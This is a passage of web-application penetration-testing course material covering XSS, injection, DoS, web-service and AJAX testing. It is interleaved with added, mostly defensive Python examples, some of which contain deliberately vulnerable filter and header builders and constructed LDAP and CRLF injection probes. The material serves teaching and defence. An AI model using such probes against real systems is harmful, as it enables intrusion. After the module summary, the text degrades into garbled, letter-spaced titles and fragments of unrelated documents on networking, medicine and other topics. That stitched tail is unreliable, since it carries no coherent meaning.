A reflected cross-site scripting attacker crafts a URL to exploit the reflected XSS vulnerability and sends it to the client in a spam mail. If the victim clicks on the link, considering it as from a trusted server, the malicious script embedded by the attacker in the URL gets executed in the victim's browser and sends the victim's session cookie to the attacker. Using this session cookie, the attacker can steal the sensitive information of the victim. Hence, to avoid this kind of attack you must check your web applications against reflected XSS attacks. If you put proper data validation mechanisms or methods in place, then you can easily determine whether the URL came originally from the server or was crafted by the attacker. Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, Webscarab, XSS Assistant, and Burp Proxy.

Step 2: Test for stored cross-site scripting
Analyze HTML code, test for stored XSS, leverage stored XSS, and verify if the file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, Webscarab, Burp, and XSS Assistant. Stored XSS attacks allow attackers to uncover sensitive information such as session authorization tokens.

Step 3: Test for DOM-based cross-site scripting
A DOM XSS attack (document object model based cross-site scripting attack) affects the client's browser script code. In this attack, the input is taken from the user and then some malicious action is performed with it, which in turn leads to the execution of injected malicious code. Web applications can be tested against DOM XSS attacks by performing source code analysis to identify JavaScript coding errors.

Step 4: Test for cross-site flashing
Analyze SWF files using tools such as SWFIntruder, the decompiler Flare, the compiler MTASC, the disassembler Flasm, Swfmill, and the debugger version of the Flash Plugin/Player. Flawed Flash applications may contain DOM-based XSS vulnerabilities. The test for cross-site flashing gives information on DOM-based cross-site scripting vulnerabilities.

Step 5: Perform SQL injection testing
Perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. SQL injection attacks give database information to the attacker.

Step 6: Perform LDAP injection testing
Use a trial-and-error approach by inserting '(', '|', and other characters in order to check the application for errors. Use the tool Softerra LDAP Browser. LDAP injection may reveal sensitive information about users and hosts.
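Step 6 probes with characters such as '(' and '|'. The following added example, not EC-Council's code, shows on a constructed login filter why those characters matter: a filter built by string concatenation changes structure when the input contains them, whereas a value escaped per RFC 4515 keeps them as literal data. No directory is contacted; the filters are only built and inspected. The filter shape and probe values are my assumptions.

```python
"""Added example (not EC-Council's code): LDAP search filters built from user
input, in a deliberately vulnerable and a hardened form, plus two structural
checks a tester can apply to the resulting filter string. The base filter and
the probe inputs are constructed for this demonstration."""

# RFC 4515 escape sequences for characters that have meaning in a search filter.
_LDAP_ESCAPES = {
    "\\": "\\5c",
    "*": "\\2a",
    "(": "\\28",
    ")": "\\29",
    "\x00": "\\00",
}


def escape_ldap_filter_value(value: str) -> str:
    """Escape a value so it can be embedded inside an LDAP search filter as data."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_vulnerable(username: str) -> str:
    """Deliberately unsafe: the raw input becomes part of the filter syntax."""
    return f"(&(objectClass=person)(uid={username}))"


def build_login_filter_hardened(username: str) -> str:
    """Same filter, with the value escaped so metacharacters stay literal."""
    return f"(&(objectClass=person)(uid={escape_ldap_filter_value(username)}))"


def filter_is_balanced(ldap_filter: str) -> bool:
    """Structural check: unescaped parentheses must balance, never going negative."""
    depth = 0
    i = 0
    while i < len(ldap_filter):
        ch = ldap_filter[i]
        if ch == "\\":
            i += 3          # skip an escape sequence such as \28 (backslash + two hex digits)
            continue
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
        i += 1
    return depth == 0


def count_unescaped_components(ldap_filter: str) -> int:
    """Number of '(' that open a filter component; escaped ones are not counted."""
    count = 0
    i = 0
    while i < len(ldap_filter):
        if ldap_filter[i] == "\\":
            i += 3
            continue
        if ldap_filter[i] == "(":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    # Constructed probe of the kind Step 6 describes: a ')' and '(' inside the user name.
    probe = "alice)(uid=*"
    for label, build in (("vulnerable", build_login_filter_vulnerable),
                         ("hardened", build_login_filter_hardened)):
        flt = build(probe)
        print(f"{label}: {flt}  components={count_unescaped_components(flt)}")
```

The vulnerable builder turns a three-component filter into a four-component one; the hardened builder keeps three, which is the difference a tester looks for when comparing responses.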
Data Validation Testing (Cont'd)

Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, NHibernate, and Ruby on Rails. This test gives information on SQL injection vulnerabilities.

Step 8: Perform XML injection testing
To perform XML injection testing, try to insert XML metacharacters and observe the response. A successful XML injection may give information about the XML structure.

Step 9: Perform SSI injection testing
Perform SSI injection testing and find out whether the web server actually supports SSI directives using tools such as Web Proxy Burp Suite, Paros, Webscarab, and the string searcher grep. If the attacker can inject SSI directives, then he or she can set or print web server CGI environment variables.

Step 10: Perform XPath injection testing
Inject XPath code and interfere with the query result. XPath injection allows the attacker to access confidential information.

Step 11: Perform IMAP/SMTP injection testing
Perform IMAP/SMTP injection testing to identify vulnerable parameters. Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection. Malicious IMAP/SMTP commands allow attackers to access the backend mail server.
Data Validation Testing (Cont'd)

Step 12: Perform code injection testing
To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. This gives information about input validation errors.

Step 13: Perform OS commanding
Perform manual code analysis and craft malicious HTTP requests to test for OS command injection attacks. OS commanding may reveal local data and system information.

Step 14: Perform buffer overflow testing
Perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow conditions. This may help you determine stack and heap memory information and application control flow.

Step 15: Perform incubated vulnerability testing
Upload a file that exploits a component in the local user workstation when viewed or downloaded by the user, and perform XSS and SQL injection attacks. Incubated vulnerabilities may give information about server configuration and input validation schemes to the attackers.

Step 16: Test for HTTP splitting/smuggling
Identify all user-controlled input that influences one or more headers in the response and check whether the user can successfully inject a CR+LF sequence in it. Attackers perform HTTP splitting/smuggling to get cookies and HTTP redirect information.
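For Step 16, the following added example, not from the original module, shows a redirect handler that copies a user-controlled parameter into the Location header, in a vulnerable form and a hardened form, together with a scan of request parameters for a CR+LF probe. The handler, the parameter names and the sample requests are constructed for this demonstration.

```python
"""Added example (not EC-Council's code): the HTTP splitting step looks for
user-controlled input that reaches a response header and accepts a CR+LF
sequence. A redirect handler that copies input into Location is shown in a
vulnerable and a hardened form, with a scanner for the CR+LF probe. All
requests are constructed; no server is involved."""
from typing import Dict, List
from urllib.parse import unquote


def contains_crlf(value: str) -> bool:
    """True if the value carries a raw or URL-encoded CR or LF."""
    decoded = unquote(value)
    return "\r" in decoded or "\n" in decoded


def build_redirect_vulnerable(target: str) -> List[str]:
    """Deliberately unsafe: the decoded parameter is placed straight into a header.
    Returns the response as a list of header lines."""
    return ["HTTP/1.1 302 Found", f"Location: {unquote(target)}", "Content-Length: 0"]


def build_redirect_hardened(target: str) -> List[str]:
    """Rejects control characters and only allows same-site relative paths."""
    decoded = unquote(target)
    if contains_crlf(decoded) or not decoded.startswith("/") or decoded.startswith("//"):
        return ["HTTP/1.1 400 Bad Request", "Content-Length: 0"]
    return ["HTTP/1.1 302 Found", f"Location: {decoded}", "Content-Length: 0"]


def header_count(response_lines: List[str]) -> int:
    """Count the lines a proxy or browser would see after re-splitting on line ends.
    An injected CR+LF inside one header value shows up as an extra line."""
    joined = "\r\n".join(response_lines)
    return len([ln for ln in joined.replace("\r\n", "\n").split("\n") if ln.strip()])


def scan_params(params: Dict[str, str]) -> List[str]:
    """Return the names of request parameters whose values contain a CR+LF sequence."""
    return [name for name, value in params.items() if contains_crlf(value)]


if __name__ == "__main__":
    # Constructed probe: a URL-encoded CR+LF followed by a harmless extra header.
    probe = "/home%0d%0aX-Injected:%201"
    print("flagged params:", scan_params({"next": probe, "q": "shoes"}))
    print("vulnerable lines:", header_count(build_redirect_vulnerable(probe)))
    print("hardened response:", build_redirect_hardened(probe)[0])
```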
Denial of Service Testing

Test -> Information obtained
Test for SQL wildcard attacks -> Application information
Test for locking customer accounts -> Login account information
Test for buffer overflows -> Buffer overflow points
Test for user-specified object allocation -> Maximum number of objects that the application can handle

To check your web application against DoS attacks, follow these steps:

Step 1: Test for SQL wildcard attacks
Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process.

Step 2: Test for locking customer accounts
Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins. If your web application doesn't lock customer accounts after a certain number of failed logins, an attacker can crack customer passwords by employing brute force attacks, dictionary attacks, etc.

Step 3: Test for buffer overflows
Perform a manual source code analysis and submit a range of inputs with varying lengths to the application to test for buffer overflows.

Step 4: Test for user-specified object allocation
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, then see if the server continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond the maximum limit.
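What Step 2 expects to find on the server, as an added example that is not code from this module: a fixed number of failed logins locks the account for a cool-down window, and the failure message is identical for an unknown username, a wrong password and a locked account, so the login form does not disclose which usernames exist. The LoginService class, the thresholds and the injectable clock are constructed for this example.

```python
import hashlib
import hmac
import os
import time

MAX_FAILURES = 5            # failed attempts before the account locks
LOCK_SECONDS = 15 * 60      # how long the lock lasts
GENERIC_FAILURE = "Invalid username or password."   # identical for every failure cause


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 50_000)


class LoginService:
    """In-memory login service with lockout; the clock is injectable for tests."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._users = {}          # username -> (salt, password hash)
        self._failures = {}       # username -> consecutive failed attempts
        self._locked_until = {}   # username -> clock value at which the lock expires
        self._dummy_salt = os.urandom(16)

    def register(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[username] = (salt, _hash_password(password, salt))

    def failure_count(self, username: str) -> int:
        return self._failures.get(username, 0)

    def is_locked(self, username: str) -> bool:
        until = self._locked_until.get(username)
        if until is None:
            return False
        if self._clock() >= until:          # lock expired: reset the counter
            del self._locked_until[username]
            self._failures.pop(username, None)
            return False
        return True

    def _record_failure(self, username: str) -> None:
        count = self._failures.get(username, 0) + 1
        self._failures[username] = count
        if count >= MAX_FAILURES:
            self._locked_until[username] = self._clock() + LOCK_SECONDS

    def login(self, username: str, password: str):
        """Return (success, message); the message is the same for every failure."""
        record = self._users.get(username)
        # Hash even for unknown users so response time does not reveal
        # whether the username exists.
        salt, stored = record if record is not None else (self._dummy_salt, b"")
        candidate = _hash_password(password, salt)
        if record is None or self.is_locked(username):
            return False, GENERIC_FAILURE        # unknown user and locked account look alike
        if hmac.compare_digest(candidate, stored):
            self._failures.pop(username, None)   # success clears the counter
            return True, "OK"
        self._record_failure(username)
        return False, GENERIC_FAILURE


if __name__ == "__main__":
    svc = LoginService()
    svc.register("alice", "correct horse battery staple")
    for _ in range(MAX_FAILURES):
        print(svc.login("alice", "wrong"))
    print("locked:", svc.is_locked("alice"))
    print(svc.login("alice", "correct horse battery staple"))
```

A locked account refuses even the correct password until the window passes, and a correct login afterwards clears the counter; whether to tell the legitimate user that the account is locked (by e-mail, not on the form) is a separate design decision.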
Denial of Service Testing (Cont'd)

Test -> Information obtained
Test for user input as a loop counter -> Logical errors in an application
Write user-provided data to disk -> Local disk exhaustion
Test for proper release of resources -> Programming flaws
Test for storing too much data in session -> Session management errors

Step 5: Test for user input as a loop counter
Test for user input as a loop counter by entering an extremely large number in the input field that the application uses as a loop counter. If the application fails to behave in its predefined manner, the application contains a logical error.

Step 6: Write user-provided data to disk
Use a script to automatically submit an extremely long value to the server in a request that is being logged.

Step 7: Test for proper release of resources
Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages.

Step 8: Test for storing too much data in session
Create a script to automate the creation of many new sessions with the server and, for each one, run the request that is suspected of caching the data within the session.
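The fixes that make the tests in Steps 4, 5 and 8 come back clean, as an added example that is not code from this module: a request parameter that drives a loop, an allocation count or a page size is parsed as a bounded integer (length-capped before conversion, so a megabyte of digits is never turned into a number), and data cached per session is held to a byte budget. The limits, parameter names, RequestRejected and SessionStore are constructed for this example.

```python
MAX_PAGE_SIZE = 100              # largest result page a caller may request
MAX_DIGITS = 9                   # refuse long digit strings before int() sees them
MAX_SESSION_BYTES = 64 * 1024    # per-session cache budget
_DIGITS = set("0123456789")


class RequestRejected(ValueError):
    """The request asked for more than the service is willing to do."""


def parse_bounded_int(raw, *, lo: int, hi: int, name: str) -> int:
    """Parse a request parameter as an integer within [lo, hi].

    Only plain ASCII decimal digits are accepted: no sign, whitespace or
    exponent, and a length cap so the value is rejected on its length rather
    than converted first and compared afterwards.
    """
    if raw is None:
        raise RequestRejected(f"{name} is required")
    if not isinstance(raw, str) or not raw or len(raw) > MAX_DIGITS or not set(raw) <= _DIGITS:
        raise RequestRejected(f"{name} must be a decimal integer of at most {MAX_DIGITS} digits")
    value = int(raw)
    if not lo <= value <= hi:
        raise RequestRejected(f"{name} must be between {lo} and {hi}")
    return value


def render_page(params: dict, items: list) -> list:
    """Page through items using caller-supplied but bounded page_size/offset
    (the loop counter and object count of Steps 4 and 5)."""
    page_size = parse_bounded_int(params.get("page_size", "20"),
                                  lo=1, hi=MAX_PAGE_SIZE, name="page_size")
    offset = parse_bounded_int(params.get("offset", "0"),
                               lo=0, hi=max(len(items) - 1, 0), name="offset")
    return items[offset:offset + page_size]


def accepts(params: dict, items: list) -> bool:
    try:
        render_page(params, items)
    except RequestRejected:
        return False
    return True


class SessionStore:
    """Session-scoped cache with a hard byte budget (Step 8)."""

    def __init__(self, budget: int = MAX_SESSION_BYTES):
        self._budget = budget
        self._data = {}

    def used_bytes(self) -> int:
        return sum(len(v) for v in self._data.values())

    def put(self, key: str, value: bytes) -> None:
        # Replacing an existing key frees its old size before the check.
        new_total = self.used_bytes() - len(self._data.get(key, b"")) + len(value)
        if new_total > self._budget:
            raise RequestRejected(f"session cache budget of {self._budget} bytes exceeded")
        self._data[key] = value

    def try_put(self, key: str, value: bytes) -> bool:
        try:
            self.put(key, value)
        except RequestRejected:
            return False
        return True


if __name__ == "__main__":
    catalogue = list(range(500))
    print(render_page({"page_size": "10", "offset": "20"}, catalogue))
    print(accepts({"page_size": "9" * 40}, catalogue))   # rejected on length alone
```

The digit-length cap matters on its own: a parser that converts first and checks the bound afterwards still pays for the conversion of a very long string, which is exactly the cost the Step 5 test tries to trigger.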
Web Services Testing

Information obtained: SQL, XPath, buffer overflow, and command injection vulnerabilities; MITM vulnerability; HTTP GET/REST attack vectors; SOAP message information.

Step 1: Gather WS information
Gather WS information using tools such as Net-Square wsChess, Soaplite, cURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods.

Step 2: Test WSDL
Test the WSDL to determine the various entry points of the web service. You can automate web services security testing using tools such as WSDigger, WebScarab, and Foundstone.

Step 3: Test XML structure
Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing.

Step 4: Test XML content level
Use web application vulnerability scanners such as WebScarab to test for XML content-level vulnerabilities.

Step 5: Test HTTP GET parameters/REST
Pass malicious content in the HTTP GET strings that invoke XML applications.

Step 6: Test naughty SOAP attachments
Craft an XML document (SOAP message) that contains malware as an attachment and send it to the web service to check whether the XML document has a SOAP attachment vulnerability.

Step 7: Perform replay testing
Attempt to resend a sniffed XML message using Wireshark and WebScarab. This test gives information about MITM vulnerability.
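A message gate that the XML structure test (Step 3) and the replay test (Step 7) should run into, as an added example that is not code from this module: before a SOAP envelope reaches the application it is rejected if it is oversized, carries any DOCTYPE declaration (which is what entity-expansion attacks need), lacks a SOAP 1.1 Envelope/Body, contains an oversized text node, or repeats a nonce or timestamp already seen. The SOAP 1.1 namespace is the real one; the Nonce/Timestamp header elements, the limits and the SoapGate class are this example's own convention (a real service would use WS-Security's equivalents).

```python
import re
import time
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"   # SOAP 1.1 envelope namespace
MAX_MESSAGE_BYTES = 256 * 1024
MAX_TEXT_BYTES = 8 * 1024
REPLAY_WINDOW = 300.0                                      # seconds a timestamp stays acceptable
_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class Rejected(Exception):
    pass


def _q(local: str) -> str:
    return f"{{{SOAP_NS}}}{local}"


class SoapGate:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._seen = {}       # nonce -> time after which it may be forgotten

    def _forget_expired(self, now: float) -> None:
        for nonce in [n for n, exp in self._seen.items() if exp <= now]:
            del self._seen[nonce]

    def accept(self, raw: bytes) -> ET.Element:
        """Return the Body element of an acceptable message, else raise Rejected."""
        if len(raw) > MAX_MESSAGE_BYTES:
            raise Rejected("oversized message")
        if _DOCTYPE.search(raw):
            raise Rejected("DOCTYPE not allowed")   # no DTD, so no entity expansion
        try:
            root = ET.fromstring(raw)
        except ET.ParseError as exc:
            raise Rejected(f"malformed XML: {exc}") from exc
        if root.tag != _q("Envelope"):
            raise Rejected("not a SOAP 1.1 envelope")
        body = root.find(_q("Body"))
        if body is None:
            raise Rejected("missing Body")
        for element in root.iter():
            for text in (element.text, element.tail):
                if text and len(text.encode("utf-8")) > MAX_TEXT_BYTES:
                    raise Rejected("oversized text node")
        header = root.find(_q("Header"))
        nonce = header.findtext("Nonce") if header is not None else None
        stamp = header.findtext("Timestamp") if header is not None else None
        if not nonce or not stamp:
            raise Rejected("missing replay protection")
        try:
            issued = float(stamp)
        except ValueError:
            raise Rejected("bad timestamp") from None
        now = self._clock()
        if abs(now - issued) > REPLAY_WINDOW:
            raise Rejected("stale timestamp")
        self._forget_expired(now)
        if nonce in self._seen:
            raise Rejected("replayed message")
        # Keep the nonce at least as long as its timestamp would still be accepted.
        self._seen[nonce] = max(now, issued) + REPLAY_WINDOW
        return body

    def check(self, raw: bytes) -> str:
        try:
            self.accept(raw)
        except Rejected as exc:
            return str(exc)
        return "accepted"


def sample_message(nonce: str, issued: float,
                   payload: str = "<GetBalance><Account>42</Account></GetBalance>") -> bytes:
    """Constructed SOAP 1.1 request used to exercise the gate."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<soap:Envelope xmlns:soap="{SOAP_NS}">'
        f"<soap:Header><Nonce>{nonce}</Nonce><Timestamp>{issued}</Timestamp></soap:Header>"
        f"<soap:Body>{payload}</soap:Body></soap:Envelope>"
    ).encode("utf-8")


if __name__ == "__main__":
    gate = SoapGate()
    msg = sample_message("nonce-1", time.time())
    print(gate.check(msg))   # accepted
    print(gate.check(msg))   # replayed message
```

The size and DOCTYPE checks run on the raw bytes before any parsing, so a billion-laughs payload or a multi-megabyte string is refused without ever costing parser time; the replay cache only needs to remember a nonce for as long as its timestamp would still pass.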
AJAX Testing

Test -> Information obtained
Test for AJAX -> AJAX application call endpoints
Parse the HTML and JavaScript files -> XMLHttpRequest object, JavaScript files, AJAX frameworks
Use a proxy to observe traffic -> Format of application requests

The following are the steps used to carry out AJAX pen testing:

Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.

Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.

Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the AJAX endpoints in order to determine the format and destination of the requests.
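The endpoint inventory that Steps 1 and 2 produce, as an added example that is not code from this module or from Sprajax: the script sources referenced by a page and the URLs its inline JavaScript calls asynchronously (XMLHttpRequest.open, fetch, jQuery $.get/$.post/$.getJSON/$.ajax) are extracted so the reviewer can compare the list against what is documented and access-controlled on the server. The regular expressions cover string-literal URLs only, and the sample page is constructed for this example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True, order=True)
class Endpoint:
    method: str
    url: str
    found_by: str   # which call pattern produced the entry


_XHR_OPEN = re.compile(r"""\.open\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]+)['"]""")
_FETCH = re.compile(r"""\bfetch\(\s*['"]([^'"]+)['"](?:\s*,\s*\{([^}]*)\})?""", re.S)
_JQ_SHORTHAND = re.compile(r"""\$\.(get|post|getJSON)\(\s*['"]([^'"]+)['"]""")
_JQ_AJAX = re.compile(r"""\$\.ajax\(\s*\{([^}]*)\}""", re.S)
_OPT_METHOD = re.compile(r"""\b(?:method|type)\s*:\s*['"](\w+)['"]""")
_OPT_URL = re.compile(r"""\burl\s*:\s*['"]([^'"]+)['"]""")
_SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*['"]([^'"]+)['"]""", re.I)


def extract_script_sources(html: str) -> list:
    """External JavaScript files the page loads (each is a further source to scan)."""
    return sorted(set(_SCRIPT_SRC.findall(html)))


def extract_endpoints(source: str) -> list:
    """Asynchronous call targets found in HTML or JavaScript text, deduplicated."""
    found = set()
    for method, url in _XHR_OPEN.findall(source):
        found.add(Endpoint(method.upper(), url, "XMLHttpRequest.open"))
    for url, options in _FETCH.findall(source):
        m = _OPT_METHOD.search(options or "")
        found.add(Endpoint(m.group(1).upper() if m else "GET", url, "fetch"))
    for fn, url in _JQ_SHORTHAND.findall(source):
        found.add(Endpoint("POST" if fn == "post" else "GET", url, f"$.{fn}"))
    for options in _JQ_AJAX.findall(source):
        u = _OPT_URL.search(options)
        if u:
            m = _OPT_METHOD.search(options)
            found.add(Endpoint(m.group(1).upper() if m else "GET", u.group(1), "$.ajax"))
    return sorted(found)


# Constructed sample page; the paths are placeholders, not a real application.
SAMPLE_HTML = """
<html><head>
<script src="/static/vendor/jquery.js"></script>
<script src="/static/app.js"></script>
</head><body>
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/api/transfer", true);
  fetch('/api/balance').then(r => r.json());
  fetch('/api/profile', { method: 'PUT', body: form });
  $.get('/api/history?limit=10', render);
  $.ajax({ url: '/api/admin/users', type: 'DELETE' });
</script>
</body></html>
"""


if __name__ == "__main__":
    for src in extract_script_sources(SAMPLE_HTML):
        print("script:", src)
    for ep in extract_endpoints(SAMPLE_HTML):
        print(f"{ep.method:6} {ep.url}  ({ep.found_by})")
```

Endpoints that appear only in script and never in the visible navigation (here the DELETE on /api/admin/users) are the ones to check first for server-side authorization, since a client-side menu hiding them is not a control.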
Module Summary

Organizations today rely heavily on web applications and Web 2.0 technologies to support key business processes and improve performance.

With increasing dependence, web applications and web services are increasingly being targeted by various attacks that result in huge revenue loss for the organizations.

Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc.

Input validation flaws are a major concern, as attackers can exploit these flaws to perform, or create a base for, most web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc.

It is also observed that most vulnerabilities result from misconfiguration and from not following standard security practices.

Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using WAF firewall/IDS, and performing regular auditing of the network using web application security tools.
W h a t is m e tro e th e rn e t
110 tv c h a n n e ls to 10 0 0 0 0 u s e rs U lf V in n e ra s C is c o S y s te m s 2 0 0 2, C is c o S y s te m s, In c. A ll rig h ts re s e rv e d. 1 W h a t is m e tro e th e rn e t O b je c tiv
J a re k G a w o r, J o e B e s te r, M a th e m a tic s & C o m p u te r. C o m p u ta tio n In s titu te,
1 4 th IE E E In te r n a tio n a l S y m p o s iu m o n H ig h P e r fo r m a n c e D is tr ib u te d C o m p u tin g (H P D C -1 4 ), R e s e a rc h T ria n g le P a rk, N C, 2 4-2 7 J u ly 2 0 0 5.
B a rn e y W a r f. U r b a n S tu d ie s, V o l. 3 2, N o. 2, 1 9 9 5 3 6 1 ±3 7 8
U r b a n S tu d ie s, V o l. 3 2, N o. 2, 1 9 9 5 3 6 1 ±3 7 8 T e le c o m m u n ic a t io n s a n d th e C h a n g in g G e o g r a p h ie s o f K n o w le d g e T r a n s m is s io n in th e L a te
EM EA. D is trib u te d D e n ia l O f S e rv ic e
EM EA S e c u rity D e p lo y m e n t F o ru m D e n ia l o f S e rv ic e U p d a te P e te r P ro v a rt C o n s u ltin g S E p p ro v a rt@ c is c o.c o m 1 A g e n d a T h re a t U p d a te IO S Es
w ith In fla m m a to r y B o w e l D ise a se. G a s tro in te s tin a l C lin ic, 2-8 -2, K a s h iw a z a, A g e o C ity, S a ita m a 3 6 2 -
E ffic a c y o f S e le c tiv e M y e lo id L in e a g e L e u c o c y te D e p le tio n in P y o d e r m a G a n g re n o su m a n d P so r ia sis A sso c ia te d w ith In fla m m a to r y B o w e l D
A n d r e w S P o m e r a n tz, M D
T e le h e a lth in V A : B r in g in g h e a lth c a r e to th e u n d e r s e r v e d in c lin ic a n d h o m e A n d r e w S P o m e r a n tz, M D N a tio n a l M e n ta l H e a lth D ir e c to r f
M P L S /V P N S e c u rity. 2 0 0 1, C is c o S y s te m s, In c. A ll rig h ts re s e rv e d.
M P L S /V P N S e c u rity M ic h a e l B e h rin g e r < m b e h rin g @ c is c o.c o m > M b e h rin g - M P L S S e c u rity 2 0 0 1, C is c o S y s te m s, In c. A ll rig h ts re s e rv e d. 1 W h
Erfa rin g fra b y g g in g a v
Erfa rin g fra b y g g in g a v m u ltim e d ia s y s te m e r Eirik M a u s e irik.m a u s @ n r.n o N R o g Im e d ia N o rs k R e g n e s e n tra l fo rs k n in g s in s titu tt in n e n a n v e n d
T ra d in g A c tiv ity o f F o re ig n In s titu tio n a l In v e s to rs a n d V o la tility
T ra d in g A c tiv ity o f F o re ig n In s titu tio n a l In v e s to rs a n d V o la tility V. Ravi Ans human Indian Ins titute of Manag ement B ang alore Rajes h Chakrabarti Indian S chool of Bus ines
/* ------------------------------------------------------------------------------------
Pr o g r a m v a r e fo r tr a fik k b e r e g n in g e r b a s e r t p å b a s is k u r v e m e to d e n n M a tr ix * x M a tr ix E s ta lp h a B e ta ; n M a tr ix * z M a tr ix ; g e n M a tr ix X
CIS CO S Y S T E M S. G u ille rm o A g u irre, Cis c o Ch ile. 2 0 0 1, C is c o S y s te m s, In c. A ll rig h ts re s e rv e d.
CIS CO S Y S T E M S A c c e s s T e c h n o lo g y T e le c o m /IT Co n n e c tiv ity W o rk s h o p G u ille rm o A g u irre, Cis c o Ch ile g m o.a g u irre @ c is c o.c o m S e s s io n N u m b e
AN EVALUATION OF SHORT TERM TREATMENT PROGRAM FOR PERSONS DRIVING UNDER THE INFLUENCE OF ALCOHOL 1978-1981. P. A. V a le s, Ph.D.
AN EVALUATION OF SHORT TERM TREATMENT PROGRAM FOR PERSONS DRIVING UNDER THE INFLUENCE OF ALCOHOL 1978-1981 P. A. V a le s, Ph.D. SYNOPSIS Two in d ep en d en t tre a tm e n t g ro u p s, p a r t ic ip
B rn m e d s rlig e b e h o v... 3 k o n o m i... 6. S s k e n d e tils k u d o g k o n o m is k frip la d s... 7 F o r ld re b e ta lin g...
V e lf rd s s e k re ta ria te t S a g s n r. 1 4 3 4 1 5 B re v id. 9 9 3 9 7 4 R e f. S O T H D ir. tlf. 4 6 3 1 4 0 0 9 s o fie t@ ro s k ild e.d k G o d k e n d e ls e s k rite rie r fo r p riv a tin
S y ste m s. T h e D atabase. D atabase m anagem e n t sy ste m
1 C h apte r 1 1 A D atabase M anagem e n t S y ste m s 1 D atabase M anagem e n t S y ste m s D atabase m anagem e n t sy ste m (D B M S ) S to re larg e co lle ctio n s o f d ata O rg anize th e d ata
Up c om i n g Events
BCASA NEWSLETTER B o s to n C h a p te r o f th e A m e ric a n Sta tis tic a l A s s o c ia tio n Serving Maine, Massachusetts, New Hampshire, Rhode Island, and Vermont Vo lu m e 2 9, N o. 3, J a n u
i n g S e c u r it y 3 1B# ; u r w e b a p p li c a tio n s f r o m ha c ke r s w ith t his å ] í d : L : g u id e Scanned by CamScanner
í d : r ' " B o m m 1 E x p e r i e n c e L : i i n g S e c u r it y. 1-1B# ; u r w e b a p p li c a tio n s f r o m ha c ke r s w ith t his g u id e å ] - ew i c h P e t e r M u la e n PACKT ' TAÞ$Æo
M Mobile Based Clinical Decision Support System Bhudeb Chakravarti & Dr. Suman Bhusan Bhattacharyya Provider & Public Health Group, VBU-HL P S aty am C om puter S ervices L im ited Bhudeb_ C hak ravarti@
How To Read A Book
DECOMPOSING MODERNITY Im ages o f Human E x is te n c e in th e w r itin g s o f E rn e s t B e c k e r B y S te p h e n W illiam M a rtin A TH ESIS in partial fulfillment of the requirements of the Masters
Farmers attitudes toward and evaluation and use of insurance for income protection on Montana wheat farms by Gordon E Rodewald
Farmers attitudes toward and evaluation and use of insurance for income protection on Montana wheat farms by Gordon E Rodewald A THESIS Submitted to the Graduate Faculty in partial fulfillment of the requirements
Software Quality Requirements and Evaluation, the ISO 25000 Series
Pittsburgh, PA 15213-3890 Software Quality Requirements and Evaluation, the ISO 25000 Series PSM Technical Working Group February 2004 Dave Zubrow Sponsored by the U.S. Department of Defense Background
UFPA Brazil. d e R e d e s Ó p tic a s e s e u s Im p a c to s n o F u tu r o d a In te r n e t
A v a n ç o s n o P la n o d e C o n tr o le d e R e d e s Ó p tic a s e s e u s Im p a c to s n o F u tu r o d a In te r n e t A n to n io A b e lé m a b e le m @ u fp a.b r Agenda In tr o d u ç ã o C
C + + a G iriş 2. K o n tro l y a p ıla rı if/e ls e b re a k co n tin u e g o to sw itc h D ö n g ü le r w h ile d o -w h ile fo r
C + + a G iriş 2 K o n tro l y a p ıla rı if/e ls e b re a k co n tin u e g o to sw itc h D ö n g ü le r w h ile d o -w h ile fo r F o n k s iy o n la r N e d ir? N a s ıl k u lla n ılır? P ro to tip v
H ig h L e v e l O v e r v iew. S te p h a n M a rt in. S e n io r S y s te m A rc h i te ct
H ig h L e v e l O v e r v iew S te p h a n M a rt in S e n io r S y s te m A rc h i te ct OPEN XCHANGE Architecture Overview A ge nda D es ig n G o als A rc h i te ct u re O ve rv i ew S c a l a b ili
ComWIN Control Desk Management
